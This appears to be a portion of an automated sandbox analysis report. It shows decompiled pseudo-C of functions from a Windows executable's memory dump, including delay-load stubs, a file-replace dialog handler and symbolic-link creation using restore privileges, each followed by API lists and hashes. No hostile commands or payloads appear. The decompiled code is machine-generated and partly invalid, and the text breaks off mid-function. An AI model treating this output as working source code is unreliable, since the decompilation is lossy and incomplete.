          0x0020d1bd

          APIs
          • ___delayLoadHelper2@8.DELAYIMP ref: 0020D1B6
            • Part of subcall function 0020D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0020D5B7
            • Part of subcall function 0020D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0020D5C8
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
          • String ID:
          • API String ID: 1269201914-0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 22%
          			E0020D1F6() {
          				void* _t2;
          				void* _t3;
          				void* _t6;
          				void* _t7;
          				void* _t8;
          
          				_push(0x22ab6c); // executed
          				E0020D53A(_t2, _t3, _t6, _t7, _t8); // executed
          				goto __eax;
          			}








          0x0020d1b1
          0x0020d1b6
          0x0020d1bd

          APIs
          • ___delayLoadHelper2@8.DELAYIMP ref: 0020D1B6
            • Part of subcall function 0020D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0020D5B7
            • Part of subcall function 0020D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0020D5C8
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
          • String ID:
          • API String ID: 1269201914-0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 22%
          			E0020D1D8() {
          				void* _t2;
          				void* _t3;
          				void* _t6;
          				void* _t7;
          				void* _t8;
          
          				_push(0x22ab6c); // executed
          				E0020D53A(_t2, _t3, _t6, _t7, _t8); // executed
          				goto __eax;
          			}








          0x0020d1b1
          0x0020d1b6
          0x0020d1bd

          APIs
          • ___delayLoadHelper2@8.DELAYIMP ref: 0020D1B6
            • Part of subcall function 0020D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0020D5B7
            • Part of subcall function 0020D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0020D5C8
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
          • String ID:
          • API String ID: 1269201914-0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 22%
          			E0020D225() {
          				void* _t2;
          				void* _t3;
          				void* _t6;
          				void* _t7;
          				void* _t8;
          
          				_push(0x22ab8c); // executed
          				E0020D53A(_t2, _t3, _t6, _t7, _t8); // executed
          				goto __eax;
          			}








          0x0020d212
          0x0020d217
          0x0020d21e

          APIs
          • ___delayLoadHelper2@8.DELAYIMP ref: 0020D217
            • Part of subcall function 0020D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0020D5B7
            • Part of subcall function 0020D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0020D5C8
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
          • String ID:
          • API String ID: 1269201914-0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 22%
          			E0020D22F() {
          				void* _t2;
          				void* _t3;
          				void* _t6;
          				void* _t7;
          				void* _t8;
          
          				_push(0x22ab8c); // executed
          				E0020D53A(_t2, _t3, _t6, _t7, _t8); // executed
          				goto __eax;
          			}








          0x0020d212
          0x0020d217
          0x0020d21e

          APIs
          • ___delayLoadHelper2@8.DELAYIMP ref: 0020D217
            • Part of subcall function 0020D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0020D5B7
            • Part of subcall function 0020D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0020D5C8
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
          • String ID:
          • API String ID: 1269201914-0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 22%
          			E0020D200() {
          				void* _t2;
          				void* _t3;
          				void* _t6;
          				void* _t7;
          				void* _t8;
          
          				_push(0x22ab6c); // executed
          				E0020D53A(_t2, _t3, _t6, _t7, _t8); // executed
          				goto __eax;
          			}








          0x0020d1b1
          0x0020d1b6
          0x0020d1bd

          APIs
          • ___delayLoadHelper2@8.DELAYIMP ref: 0020D1B6
            • Part of subcall function 0020D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0020D5B7
            • Part of subcall function 0020D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0020D5C8
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
          • String ID:
          • API String ID: 1269201914-0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 58%
          			E001F9BD6(void* __ecx) {
          				int _t2;
          
          				_t2 = SetEndOfFile( *(__ecx + 4)); // executed
          				asm("sbb eax, eax");
          				return  ~(_t2 - 1) + 1;
          			}




          0x001f9bd9
          0x001f9be2
          0x001f9be5

          APIs
          • SetEndOfFile.KERNELBASE(?,001F8F33,?,?,-00001960), ref: 001F9BD9
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: File
          • String ID:
          • API String ID: 749574446-0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 58%
          			E00209A8D(WCHAR* _a4) {
          				signed int _t2;
          
          				_t2 = SetCurrentDirectoryW(_a4); // executed
          				asm("sbb eax, eax");
          				return  ~( ~_t2);
          			}




          0x00209a91
          0x00209a99
          0x00209a9d

          APIs
          • SetCurrentDirectoryW.KERNELBASE(?,00209CE4,C:\Users\user\Desktop,00000000,002385FA,00000006), ref: 00209A91
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: CurrentDirectory
          • String ID:
          • API String ID: 1611563598-0
          Uniqueness

          Uniqueness Score: -1.00%

          Non-executed Functions

          C-Code - Quality: 60%
          			E0020AFB9(void* __ecx, void* __edx, void* __eflags, char _a4, short _a8, char _a12, short _a108, short _a112, char _a192, char _a212, struct _WIN32_FIND_DATAW _a288, signed char _a304, signed char _a308, struct _FILETIME _a332, intOrPtr _a340, intOrPtr _a344, short _a884, short _a896, short _a900, int _a1904, char _a1924, int _a1928, short _a2596, short _a2616, char _a2628, char _a2640, struct HWND__* _a6740, intOrPtr _a6744, signed short _a6748, intOrPtr _a6752) {
          				struct _FILETIME _v0;
          				struct _SYSTEMTIME _v12;
          				struct _SYSTEMTIME _v16;
          				struct _FILETIME _v24;
          				void* _t73;
          				void* _t136;
          				long _t137;
          				void* _t141;
          				void* _t142;
          				void* _t143;
          				void* _t144;
          				void* _t145;
          				signed short _t148;
          				void* _t151;
          				intOrPtr _t152;
          				signed int _t153;
          				signed int _t157;
          				struct HWND__* _t159;
          				intOrPtr _t162;
          				void* _t163;
          				int _t166;
          				int _t169;
          				void* _t173;
          				void* _t177;
          				void* _t179;
          
          				_t156 = __edx;
          				_t151 = __ecx;
          				E0020D940();
          				_t148 = _a6748;
          				_t162 = _a6744;
          				_t159 = _a6740;
          				if(E001F12D7(__edx, _t159, _t162, _t148, _a6752, L"REPLACEFILEDLG", 0, 0) == 0) {
          					_t163 = _t162 - 0x110;
          					if(_t163 == 0) {
          						SetFocus(GetDlgItem(_t159, 0x6c));
          						E001FFAB1( &_a2640, _a6752, 0x800);
          						E001FBA19( &_a2628,  &_a2628, 0x800);
          						SetDlgItemTextW(_t159, 0x65,  &_a2616);
          						 *0x22df00( &_a2616, 0,  &_a1924, 0x2b4, 0x100);
          						SendDlgItemMessageW(_t159, 0x66, 0x170, _a1904, 0);
          						_t173 = FindFirstFileW( &_a2596,  &_a288);
          						if(_t173 != 0xffffffff) {
          							FileTimeToLocalFileTime( &_a332,  &(_v24.dwHighDateTime));
          							FileTimeToSystemTime( &(_v24.dwHighDateTime),  &_v12);
          							_push(0x32);
          							_push( &_a12);
          							_push(0);
          							_push( &_v12);
          							_t166 = 2;
          							GetTimeFormatW(0x400, 0x800, ??, ??, ??, ??);
          							GetDateFormatW(0x400, 0,  &_v12, 0,  &_a112, 0x32);
          							_push( &_a12);
          							_push( &_a112);
          							E001F3E41( &_a900, 0x200, L"%s %s %s", E001FDA42(_t151, 0x99));
          							_t179 = _t177 + 0x18;
          							SetDlgItemTextW(_t159, 0x6a,  &_a900);
          							FindClose(_t173);
          							if((_a308 & 0x00000010) == 0) {
          								_push(0x32);
          								_push( &_a212);
          								_push(0);
          								_pop(0);
          								asm("adc eax, ebp");
          								_push(_a340);
          								_push(0 + _a344);
          								E00209D99();
          								_push(E001FDA42(0 + _a344, 0x98));
          								E001F3E41( &_a884, 0x200, L"%s %s",  &_a192);
          								_t179 = _t179 + 0x14;
          								SetDlgItemTextW(_t159, 0x68,  &_a884);
          							}
          							SendDlgItemMessageW(_t159, 0x67, 0x170, _a1928, 0);
          							_t152 =  *0x2375f4; // 0x0
          							E0020082F(_t152, _t156,  &_a4);
          							FileTimeToLocalFileTime( &_v0,  &_v24);
          							FileTimeToSystemTime( &_v24,  &_v16);
          							GetTimeFormatW(0x400, _t166,  &_v16, 0,  &_a8, 0x32);
          							GetDateFormatW(0x400, 0,  &_v16, 0,  &_a108, 0x32);
          							_push( &_a8);
          							_push( &_a108);
          							E001F3E41( &_a896, 0x200, L"%s %s %s", E001FDA42(_t152, 0x99));
          							_t177 = _t179 + 0x18;
          							SetDlgItemTextW(_t159, 0x6b,  &_a896);
          							_t153 =  *0x24ce14;
          							_t157 =  *0x24ce10;
          							if((_a304 & 0x00000010) == 0 || (_t157 | _t153) != 0) {
          								E00209D99(_t157, _t153,  &_a212, 0x32);
          								_push(E001FDA42(_t153, 0x98));
          								E001F3E41( &_a884, 0x200, L"%s %s",  &_a192);
          								_t177 = _t177 + 0x14;
          								SetDlgItemTextW(_t159, 0x69,  &_a884);
          							}
          						}
          						L27:
          						_t73 = 0;
          						L28:
          						return _t73;
          					}
          					if(_t163 != 1) {
          						goto L27;
          					}
          					_t169 = 2;
          					_t136 = (_t148 & 0x0000ffff) - _t169;
          					if(_t136 == 0) {
          						L11:
          						_push(6);
          						L12:
          						_pop(_t169);
          						L13:
          						_t137 = SendDlgItemMessageW(_t159, 0x66, 0x171, 0, 0);
          						if(_t137 != 0) {
          							 *0x22df4c(_t137);
          						}
          						EndDialog(_t159, _t169);
          						goto L1;
          					}
          					_t141 = _t136 - 0x6a;
          					if(_t141 == 0) {
          						_t169 = 0;
          						goto L13;
          					}
          					_t142 = _t141 - 1;
          					if(_t142 == 0) {
          						_t169 = 1;
          						goto L13;
          					}
          					_t143 = _t142 - 1;
          					if(_t143 == 0) {
          						_push(4);
          						goto L12;
          					}
          					_t144 = _t143 - 1;
          					if(_t144 == 0) {
          						goto L13;
          					}
          					_t145 = _t144 - 1;
          					if(_t145 == 0) {
          						_push(3);
          						goto L12;
          					}
          					if(_t145 != 1) {
          						goto L27;
          					}
          					goto L11;
          				}
          				L1:
          				_t73 = 1;
          				goto L28;
          			}

          APIs
            • Part of subcall function 001F12D7: GetDlgItem.USER32(00000000,00003021), ref: 001F131B
            • Part of subcall function 001F12D7: SetWindowTextW.USER32(00000000,002222E4), ref: 001F1331
          • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0020B04A
          • EndDialog.USER32(?,00000006), ref: 0020B05D
          • GetDlgItem.USER32(?,0000006C), ref: 0020B079
          • SetFocus.USER32(00000000), ref: 0020B080
          • SetDlgItemTextW.USER32(?,00000065,?), ref: 0020B0C0
          • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0020B0F3
          • FindFirstFileW.KERNEL32(?,?), ref: 0020B109
          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0020B127
          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0020B137
          • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0020B154
          • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0020B172
          • _swprintf.LIBCMT ref: 0020B1A2
            • Part of subcall function 001F3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001F3E54
          • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0020B1B5
          • FindClose.KERNEL32(00000000), ref: 0020B1B8
          • _swprintf.LIBCMT ref: 0020B213
          • SetDlgItemTextW.USER32(?,00000068,?), ref: 0020B226
          • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0020B23C
          • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0020B25C
          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0020B26C
          • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0020B286
          • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0020B29E
          • _swprintf.LIBCMT ref: 0020B2CF
          • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0020B2E2
          • _swprintf.LIBCMT ref: 0020B332
          • SetDlgItemTextW.USER32(?,00000069,?), ref: 0020B345
            • Part of subcall function 00209D99: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00209DBF
            • Part of subcall function 00209D99: GetNumberFormatW.KERNEL32 ref: 00209E0E
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
          • String ID: %s %s$%s %s %s$REPLACEFILEDLG
          • API String ID: 797121971-1840816070
          • Opcode ID: ac30c839278bc9d068f4399890f234dbc592020e7f5390f7aba469d768f423a0
          • Instruction ID: 2bafe37d892c63fbf8a5c3190664f7b3b495c093bcd9e6eb04657c6ccd313433
          • Opcode Fuzzy Hash: ac30c839278bc9d068f4399890f234dbc592020e7f5390f7aba469d768f423a0
          • Instruction Fuzzy Hash: B3919172658349BBD332DBA0DD49FFB77ACEB8A700F000819F749D6082D775AA158762
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 83%
          			E001F6FC6(void* __edx) {
          				void* __esi;
          				signed int _t111;
          				signed int _t113;
          				void* _t116;
          				int _t118;
          				intOrPtr _t121;
          				signed int _t139;
          				int _t145;
          				void* _t182;
          				void* _t185;
          				void* _t190;
          				short _t191;
          				void* _t197;
          				void* _t202;
          				void* _t203;
          				void* _t222;
          				void* _t223;
          				intOrPtr _t224;
          				intOrPtr _t226;
          				void* _t228;
          				WCHAR* _t229;
          				intOrPtr _t233;
          				short _t237;
          				void* _t238;
          				intOrPtr _t239;
          				short _t241;
          				void* _t242;
          				void* _t244;
          				void* _t245;
          
          				_t223 = __edx;
          				E0020D870(E0022126D, _t242);
          				E0020D940();
          				 *((intOrPtr*)(_t242 - 0x18)) = 1;
          				if( *0x230043 == 0) {
          					E001F7A15(L"SeRestorePrivilege");
          					E001F7A15(L"SeCreateSymbolicLinkPrivilege");
          					 *0x230043 = 1;
          				}
          				_t199 = _t242 - 0x2c;
          				E001F6ED7(_t242 - 0x2c, 0x1418);
          				_t197 =  *(_t242 + 0x10);
          				 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
          				E001FFAB1(_t242 - 0x107c, _t197 + 0x1104, 0x800);
          				 *((intOrPtr*)(_t242 - 0x10)) = E00212B33(_t242 - 0x107c);
          				_t232 = _t242 - 0x107c;
          				_t228 = _t242 - 0x207c;
          				_t111 = E00214DA0(_t242 - 0x107c, L"\\??\\", 4);
          				_t245 = _t244 + 0x10;
          				asm("sbb al, al");
          				_t113 =  ~_t111 + 1;
          				 *(_t242 - 0x14) = _t113;
          				if(_t113 != 0) {
          					_t232 = _t242 - 0x1074;
          					_t190 = E00214DA0(_t242 - 0x1074, L"UNC\\", 4);
          					_t245 = _t245 + 0xc;
          					if(_t190 == 0) {
          						_t191 = 0x5c;
          						 *((short*)(_t242 - 0x207c)) = _t191;
          						_t228 = _t242 - 0x207a;
          						_t232 = _t242 - 0x106e;
          					}
          				}
          				E00214D7E(_t228, _t232);
          				_t116 = E00212B33(_t242 - 0x207c);
          				_t233 =  *((intOrPtr*)(_t242 + 8));
          				_t229 =  *(_t242 + 0xc);
          				 *(_t242 + 0x10) = _t116;
          				if( *((char*)(_t233 + 0x618f)) != 0) {
          					L9:
          					_push(1);
          					_push(_t229);
          					E001F9D3A(_t199, _t242);
          					if( *((char*)(_t197 + 0x10f1)) != 0 ||  *((char*)(_t197 + 0x2104)) != 0) {
          						_t118 = CreateDirectoryW(_t229, 0);
          						__eflags = _t118;
          						if(_t118 == 0) {
          							goto L27;
          						}
          						goto L14;
          					} else {
          						_t182 = CreateFileW(_t229, 0x40000000, 0, 0, 1, 0x80, 0);
          						if(_t182 == 0xffffffff) {
          							L27:
          							 *((char*)(_t242 - 0x18)) = 0;
          							L28:
          							E001F159C(_t242 - 0x2c);
          							 *[fs:0x0] =  *((intOrPtr*)(_t242 - 0xc));
          							return  *((intOrPtr*)(_t242 - 0x18));
          						}
          						CloseHandle(_t182);
          						L14:
          						_t121 =  *((intOrPtr*)(_t197 + 0x1100));
          						if(_t121 != 3) {
          							__eflags = _t121 - 2;
          							if(_t121 == 2) {
          								L18:
          								_t202 =  *(_t242 - 0x2c);
          								_t224 =  *((intOrPtr*)(_t242 - 0x10));
          								 *_t202 = 0xa000000c;
          								_t237 = _t224 + _t224;
          								 *((short*)(_t202 + 0xa)) = _t237;
          								 *((short*)(_t202 + 4)) = 0x10 + ( *(_t242 + 0x10) + _t224) * 2;
          								 *((intOrPtr*)(_t202 + 6)) = 0;
          								E00214D7E(_t202 + 0x14, _t242 - 0x107c);
          								_t60 = _t237 + 2; // 0x3
          								_t238 =  *(_t242 - 0x2c);
          								 *((short*)(_t238 + 0xc)) = _t60;
          								 *((short*)(_t238 + 0xe)) =  *(_t242 + 0x10) +  *(_t242 + 0x10);
          								E00214D7E(_t238 + ( *((intOrPtr*)(_t242 - 0x10)) + 0xb) * 2, _t242 - 0x207c);
          								_t139 =  *(_t242 - 0x14) & 0x000000ff ^ 0x00000001;
          								__eflags = _t139;
          								 *(_t238 + 0x10) = _t139;
          								L19:
          								_t203 = CreateFileW(_t229, 0xc0000000, 0, 0, 3, 0x2200000, 0);
          								 *(_t242 + 0x10) = _t203;
          								if(_t203 == 0xffffffff) {
          									goto L27;
          								}
          								_t145 = DeviceIoControl(_t203, 0x900a4, _t238, ( *(_t238 + 4) & 0x0000ffff) + 8, 0, 0, _t242 - 0x30, 0);
          								_t262 = _t145;
          								if(_t145 != 0) {
          									E001F943C(_t242 - 0x30a0);
          									 *(_t242 - 4) = 1;
          									 *((intOrPtr*)( *((intOrPtr*)(_t242 - 0x30a0)) + 8))();
          									_t239 =  *((intOrPtr*)(_t242 + 8));
          									 *(_t242 - 0x309c) =  *(_t242 + 0x10);
          									asm("sbb ecx, ecx");
          									asm("sbb ecx, ecx");
          									asm("sbb ecx, ecx");
          									E001F9A7E(_t242 - 0x30a0, _t239,  ~( *(_t239 + 0x72c8)) & _t197 + 0x00001040,  ~( *(_t239 + 0x72cc)) & _t197 + 0x00001048,  ~( *(_t239 + 0x72d0)) & _t197 + 0x00001050);
          									E001F94DA(_t242 - 0x30a0);
          									__eflags =  *((char*)(_t239 + 0x61a0));
          									if( *((char*)(_t239 + 0x61a0)) == 0) {
          										E001FA12F(_t229,  *((intOrPtr*)(_t197 + 0x24)));
          									}
          									E001F946E(_t242 - 0x30a0);
          									goto L28;
          								}
          								CloseHandle( *(_t242 + 0x10));
          								E001F6BF5(_t262, 0x15, 0, _t229);
          								_t160 = GetLastError();
          								if(_t160 == 5 || _t160 == 0x522) {
          									if(E001FFC98() == 0) {
          										E001F1567(_t242 - 0x7c, 0x18);
          										_t160 = E00200A9F(_t242 - 0x7c);
          									}
          								}
          								E0020E214(_t160);
          								E001F6E03(0x2300e0, 9);
          								_push(_t229);
          								if( *((char*)(_t197 + 0x10f1)) == 0) {
          									DeleteFileW();
          								} else {
          									RemoveDirectoryW();
          								}
          								goto L27;
          							}
          							__eflags = _t121 - 1;
          							if(_t121 != 1) {
          								goto L27;
          							}
          							goto L18;
          						}
          						_t222 =  *(_t242 - 0x2c);
          						_t226 =  *((intOrPtr*)(_t242 - 0x10));
          						 *_t222 = 0xa0000003;
          						_t241 = _t226 + _t226;
          						 *((short*)(_t222 + 0xa)) = _t241;
          						 *((short*)(_t222 + 4)) = 0xc + ( *(_t242 + 0x10) + _t226) * 2;
          						 *((intOrPtr*)(_t222 + 6)) = 0;
          						E00214D7E(_t222 + 0x10, _t242 - 0x107c);
          						_t40 = _t241 + 2; // 0x3
          						_t238 =  *(_t242 - 0x2c);
          						 *((short*)(_t238 + 0xc)) = _t40;
          						 *((short*)(_t238 + 0xe)) =  *(_t242 + 0x10) +  *(_t242 + 0x10);
          						E00214D7E(_t238 + ( *((intOrPtr*)(_t242 - 0x10)) + 9) * 2, _t242 - 0x207c);
          						goto L19;
          					}
          				}
          				if( *(_t242 - 0x14) != 0) {
          					goto L27;
          				}
          				_t185 = E001FB4F2(_t197 + 0x1104);
          				_t255 = _t185;
          				if(_t185 != 0) {
          					goto L27;
          				}
          				_push(_t197 + 0x1104);
          				_push(_t229);
          				_push(_t197 + 0x28);
          				_push(_t233);
          				if(E001F77F7(_t223, _t255) == 0) {
          					goto L27;
          				}
          				goto L9;
          			}

          APIs
          • __EH_prolog.LIBCMT ref: 001F6FCB
          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 001F712B
          • CloseHandle.KERNEL32(00000000), ref: 001F713B
            • Part of subcall function 001F7A15: GetCurrentProcess.KERNEL32(00000020,?), ref: 001F7A24
            • Part of subcall function 001F7A15: GetLastError.KERNEL32 ref: 001F7A6A
            • Part of subcall function 001F7A15: CloseHandle.KERNEL32(?), ref: 001F7A79
          • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 001F7146
          • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 001F7254
          • DeviceIoControl.KERNEL32 ref: 001F7280
          • CloseHandle.KERNEL32(?), ref: 001F7292
          • GetLastError.KERNEL32(00000015,00000000,?), ref: 001F72A2
          • RemoveDirectoryW.KERNEL32(?), ref: 001F72EE
          • DeleteFileW.KERNEL32(?), ref: 001F7316
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
          • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
          • API String ID: 3935142422-3508440684
          • Opcode ID: 81f9bdf3f33b741a3d0e18f0a30824efcf5b53afc7648e4f01983fb5520062b7
          • Instruction ID: dad251ee2871ac3830da2e1c166e18c04c6a332aaa7b195a6dfe93e6ddea3175
          • Opcode Fuzzy Hash: 81f9bdf3f33b741a3d0e18f0a30824efcf5b53afc7648e4f01983fb5520062b7
          • Instruction Fuzzy Hash: E7B1D171904218ABEF21DFA4DC45FFE77B8AF19300F0445A9FA19E7182D770AA59CB60
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 84%
          			E001F30FC(intOrPtr* __ecx, void* __eflags) {
          				void* __ebp;
          				signed int _t242;
          				void* _t248;
          				unsigned int _t250;
          				signed int _t254;
          				signed int _t255;
          				unsigned int _t256;
          				void* _t257;
          				char _t270;
          				signed int _t289;
          				unsigned int _t290;
          				intOrPtr _t291;
          				signed int _t292;
          				signed int _t295;
          				char _t302;
          				signed char _t304;
          				signed int _t320;
          				signed int _t331;
          				signed int _t335;
          				signed int _t350;
          				signed char _t352;
          				unsigned int _t362;
          				void* _t378;
          				void* _t380;
          				void* _t381;
          				void* _t392;
          				intOrPtr* _t394;
          				intOrPtr* _t396;
          				signed int _t409;
          				signed int _t419;
          				char _t431;
          				signed int _t432;
          				signed int _t437;
          				signed int _t441;
          				intOrPtr _t449;
          				unsigned int _t455;
          				unsigned int _t458;
          				signed int _t462;
          				signed int _t470;
          				signed int _t479;
          				signed int _t484;
          				signed int _t498;
          				intOrPtr _t499;
          				signed int _t500;
          				signed char _t501;
